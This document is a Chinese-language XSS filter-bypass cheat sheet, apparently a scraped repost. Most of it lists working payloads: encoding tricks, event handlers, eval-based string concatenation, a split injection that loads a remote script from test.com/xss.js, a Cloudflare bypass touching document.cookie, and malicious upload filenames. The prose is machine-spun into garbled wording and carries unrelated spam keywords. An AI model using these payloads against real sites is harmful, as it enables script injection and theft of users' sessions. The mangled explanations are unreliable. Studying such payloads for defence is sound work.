官员艳照门 共享 ｜ 一文教你通盘绕过xss姿势。

声名：本次测试只作为学惯用处官员艳照门，请勿未授权进行渗入测试，切勿用于其它用途！公众号当今只对常读和星方向公众号才展示大图推送，提议巨匠把 明暗安全 设为星标，不然可能就看不到啦！

1.轻佻配景xss1. 前端过滤

burp执包改包绕过

2. 双写绕过

<scri<script>pt>alert(111)</scri<script>pt>

3. 事件绕过

如：onclick，onmousemove事件

onmouseover='alert('yyds')'

4. 大小写绕过

<SCRIPT>aLeRT(111)</sCRIpt>

5. 驻守侵扰绕过

如：<scri<!--test--> pt> alert(1);</scr<!--test--> ipt>

6. 伪契约绕过

如:111'> <a href='javascript:alert(document.domain)'>xss</a>

< table background= 'javascript:alert(/xss/)'> </table>

<img srC= 'javascript:alert('ss);' >

7. 空格回车Tab绕过

空格：<img src= 'javascript:alert('xss');' >

TAB：< img src= 'javasc :ript:alert('ss');' >

回车：< img src= 'jav

ascript:

alert('xss');' >

8. 编码绕过1. base64编码：

若是过滤了 < > ' ' script，不错用base64编码

eval(') eval函数把字符串 手脚念阵势践诺atob函数是将base64密文转机为名文

'> <script> eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ== ));</script>

base64编码多用于如下两种情况：

1. <a href= '可控点'>

2. < iframe src= '可控点'>

例如：

<a href= 'data:text/html;base64，PGItZyBzcmM9eCBvbmVycm9yPWFsZXJOKDEpPg=='>test<

/a>

这么当test A聚拢点击时就会以data契约页面以html/text的口头领路编码为base64然后单点击

a聚拢时base64的编码就被收复成咱们本来的< img src=x οnerrοr= alert(1)>

2. JS编码：

八进制：

三个八进制数字，若是个数不够，在前边补0，例如'e'的编码为'\145'

3. 十六进制：

两个十六进制数字，若是个数不够，在前边补0，'e'的编码为'\x65'

十六进制前边加上\x不错被JS识别

尖括号被转义时，诓骗十六进制绕过

如：\\x3cscript\\x3ealert(document.domain);\x3c/script\x3e

4. unicode：

四个十六进制数字，若是个数不够，在前边补0，'e'的编码为'e'

十六进制前边加上\u00形成JS可识别的Unicode编码

\alert(document.domain);\

关于一些戒指字符，使用稀奇的C类型的转义立场(例如\n和\r)

5. HTML实体编码：

字符编码：十进制、十六进制编码，容颜为'&#数值;'官员艳照门，例如'<'不错编码为'<和'<'

<img src='x'οnerrοr= 'al&# 101;r 16;(1)'>

浏览器是不会在html|标签里领路js编码的，是以咱们在οnerrοr=背面放js中的编码是不会领路你放进去是什么即是什么

6. URL编码：

进行两次URL全编码

<img src='x' onerror='eval(unescape('alert("xss");'))'>

Ascii码绕过

<img src='x'

onerror='eval(String.fromCharCode(97，108，101，114，116，40，34，120，115，115，34，41，59))'>

9. CSS绕过1. 诓骗IE特点绕过XSS过滤：

IE中两个反单引号hgj `` 不错闭合一个左边双引号

``οnmοusemοve= alert(1)

2. 诓骗css特点绕过xss过滤：

竖立background:url，诓骗JavaScript伪契约践诺js，咫尺唯有IE浏览器撑持

background-color:# f00;background:url(javascript:alert(document.domain);');

低版块IE浏览器6 10 D版块弹窗收效

3. IE中诓骗CSS触发xss：

CSS中的驻守/**/

xss:expres/**/sion(if(!window.x){alert(document.domain);window.x= 1;})

10.过滤空格

<html><imgAAsrcAAonerrorBB=BBalertCC(1)DD</html>

A位置可填充 /，/123/， ， ，， ， B位置可填充 ， ，， ， C位置可填充 ，/**/，若是加了双引号，则不错填充 ， ，， ， D位置可填充 ， ，， ， ，//，>

11.字符拼接诓骗eval

<img src='x' onerror='a=`aler`;b=`t`;c='(`xss`);';eval(a b c)'>

诓骗top

<img src='x' onerror='top['al' 'ert'](1)'>

诓骗window

<img src='x' onerror='window['al' 'ert'](1)'>

诓骗self

<img src='x' onerror='self[`al` `ert`](1)'>

诓骗parent

<img src='x' onerror='parent[`al` `ert`](1)'>

诓骗frames

<img src='x' onerror='frames[`al` `ert`](1)'>

12.其它字符欺侮

<<script>alert('xss');//<</script>

<title><img src=</title>><img src=x onerror='alert(`xss`);'> //因为title标签的优先级比img的高，是以会先闭合title，从而导致前边的img标签无效

<SCRIPT>var a='\\';alert('xss');//';</SCRIPT>

13.过滤双引号，单引号

用反引号代替单双引号

<img src='x' onerror=alert(`xss`);>

14.过滤括号

当括号被过滤的本领不错使用throw来绕过

<svg/onload='window.onerror=eval;throw'=alert\x281\x29';'>

15.alert 过滤prompt 替换

<script>prompt(/xss/)</script>

confirm 替换

<script>confirm(/xss/)</script>

console.log 替换

<script>console.log(3)</script>

document.write 替换

<script>document.write(1)</script>

base64 绕过

<img src=x onerror='Function`a${atob`YWxlcnQoMSk=`}```'>

<img src=x

onerror='``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```'>

16.常用函数

<img src='x' onerror='eval(alert(1))'>

<img src='x' onerror='open(alert(1))'>

欧美色色

<img src='x' onerror='document.write(alert(1))'>

<img src='x' onerror='setTimeout(alert(1))'>

<img src='x' onerror='setInterval(alert(1))'>

<img src='x' onerror='Set.constructor(alert(1))'>

<img src='x' onerror='Map.constructor(alert(1))'>

<img src='x' onerror='Array.constructor(alert(1))'>

<img src='x' onerror='WeakSet.constructor(alert(1))'>

<img src='x' onerror='constructor.constructor(alert(1))'>

<img src='x' onerror='[1].map(alert(1))'>

<img src='x' onerror='[1].find(alert(1))'>

<img src='x' onerror='[1].every(alert(1))'>

<img src='x' onerror='[1].filter(alert(1))'>

<img src='x' onerror='[1].forEach(alert(1))'>

<img src='x' onerror='[1].findIndex(alert(1))'>

17.赋值拼接

<img src onerror=_=alert，_(1)>

<img src x=al y=ert onerror=top[x y](1)>

<img src onerror=top[a='al'，b='ev'，b a]('alert(1)')>

<img src onerror=['ale' 'rt'].map(top['ev' 'al'])[0]['valu' 'eOf']()(1)>

18.拆分法

当 Web 应用阵势对认识用户的输入长度进行了舍弃时，这时无法注入较长的xss报复向量，可是特定情况下，这种舍弃不错通过拆分法注入的口头进行绕过

<script>a='document.write(''</script>

<script>a=a '<script src=ht'</script>

<script>a=a 'tp://test.com/xs'</script>

<script>a=a 's.js></script>')'</script>

<script>eval(a)</script>

通过上头的拆分法不错凑合出底下圆善的报复向量：

document.write('<script src = http://test.com/xss.js></script>')

19.上传文献构造xss

上传鄙俚文献蜕变文献名为xss语句

<script>alert(110)</script>.gif/png

20. XSS绕过cloudflarePayload：

<svg onload=alert&#0000000040document.cookie)>

21. XSS绕过过滤Payload：

'/><svg svg svg//On OnLoAd=confirm(1)>

22. XSS(上传图片)<img src=x onerror=alert('XSS')>.png '>

<img src=x onerror=alert('XSS')>.png '>

<svg onmouseover=alert(1)>.svg

<<script>alert('xss')<!--a-->a.png

碰到不错上传图片况且不错自界说文献名的本领不错试试，这么上传以后当咱们造访这个图片的本领有可能就会触发xss了

原文聚拢：https://www.yuque.com/besilent/null/em256fm0kn5ofipl官员艳照门

————————————————————— 本站仅提供存储职业，通盘本色均由用户发布，如发现存害或侵权本色，请点击举报。